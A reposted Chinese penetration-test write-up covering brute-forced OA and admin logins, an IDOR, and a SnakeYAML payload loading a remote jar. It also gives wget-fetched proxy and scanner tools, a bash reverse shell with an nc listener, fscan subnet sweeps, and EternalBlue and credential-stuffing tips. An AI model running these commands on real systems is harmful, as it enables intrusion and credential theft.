题记
我的思路
Web端找入侵点
Getshell失败,放弃,好吧,是因为这个站太卡了,页面定时刷新,太恶心。
转到OA系统,通过爆破,成功爆破出一个账户,进入OA。进入OA后有一些好处,一个是有很多关联系统直接进入使用,另一个是可以获取OA里所有用户的信息对其他系统爆破,还有一个是翻阅OA里文件发现一些系统与一些默认密码,更甚者可以翻到vpn等信息。
Getshell点找找,都没找到,他们系统有一个特点,能传木马但是不解析,后续拿权发现目标网站全部都是jar包起的站点,是不能通过上传webshell提权的,只能内存马或者命令执行反弹shell。
后续外网又爆破了一堆后台,这里不一一列举了。下面写两个其他系统。
1、工厂管理系统(若依二开)
通过爆破拿到普通用户权限,在修改个人资料处发现越权漏洞。可以遍历所有用户信息,于是猜想修改密码处有越权。
org.yaml.snakeyaml.Yaml.load(
'!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://xxx/payload-v2.jar"]]]]'
)
外网进内网的点
这里我是利用一个上传nps代理进内网,一个上传fscan进行扫描,一个windows上线cs抓系统密码,浏览器密码。
1、上传nps代理进内网
mkdir ../
test
wget -P ../
test
http://xxx/ew_linux_x64
chmod 777 ../
test
/ew_linux_x64
../
test
/ew_linux_x64 -s ssocksd -l 9000
运行nps:
wget -P ../
test
http://ip/linux_amd64_client.tar.gz
tar -zxvf ../
test
/linux_amd64_client.tar.gz -C ../
test
../
test
/npc -server=ip:8024 -vkey=4z4oardkqdtu4ro6 -
type
=tcp
shiro拿到权限之后,经测试echo 'bash -i >& /dev/tcp/ip/7778 0>&1' > ../test/1.sh是不行的。最优解是先写好1.sh,然后控制肉鸡远程下载1.sh。
Vps监听端口:nc -nlvp 7778
wget -P ../
test
http://xxx/1.sh
../
test
/1.sh
上传fscan到目标上,本地挂代理扫会出各种各样问题。
wget -P ../
test
http://xxx/fscan_amd64
../
test
/fscan_amd64 -h ip/16 -p 80 -np -nopoc -o b.txt
先探测存活的网段。
../
test
/fscan_amd64 -hf ip.txt -np -nopoc -o ip-c.txt
翻到一些系统的管理员密码。登录后台。
内网横向
内网资产搜集;
多关注windows系统,可以用永恒之蓝渗透;
关注nacos、vmware等可控制大部分主机的系统;
利用漏洞获取数据库,系统密码,然后利用密码对跑出的22,3306,1433,445等端口进行密码撞库。
大佬思路
其他技术问题
文章来源:博客园(@
11
阳光)
原文地址:https:
//www.cnblogs.com/sunny11/p/16105414.html
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
原文始发于微信公众号(黑白之道):某次项目练手记录
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论